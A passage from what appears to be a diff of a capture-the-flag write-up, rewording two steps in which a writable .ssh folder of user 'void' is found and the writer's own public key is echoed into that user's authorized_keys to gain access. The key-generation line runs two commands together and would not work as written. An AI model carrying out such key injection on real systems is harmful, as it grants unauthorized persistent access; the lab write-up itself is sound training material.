Kibo00/Hackfinity-writeups/avengers.md

 ls /home/
 ```

-Suppose we find the user `void` and the folder `/home/void/.ssh/` is **writable**.
+We found the user `void` and the folder `/home/void/.ssh/` is **writable**.

 ---

 ## 🔑 Step 8 – SSH Key Injection

-On your machine, generate a key:
+On our machine we generate an ssh public key:

 ```bash
 ssh-keygen -t rsa -b 4096 -f mykey cat mykey.pub
 ```

-Copy the content and inject it into the target:
+We then copy the content and inject it into the target:

 ```bash
 echo "PASTE_YOUR_SSH_PUBLIC_KEY_HERE" > /home/void/.ssh/authorized_keys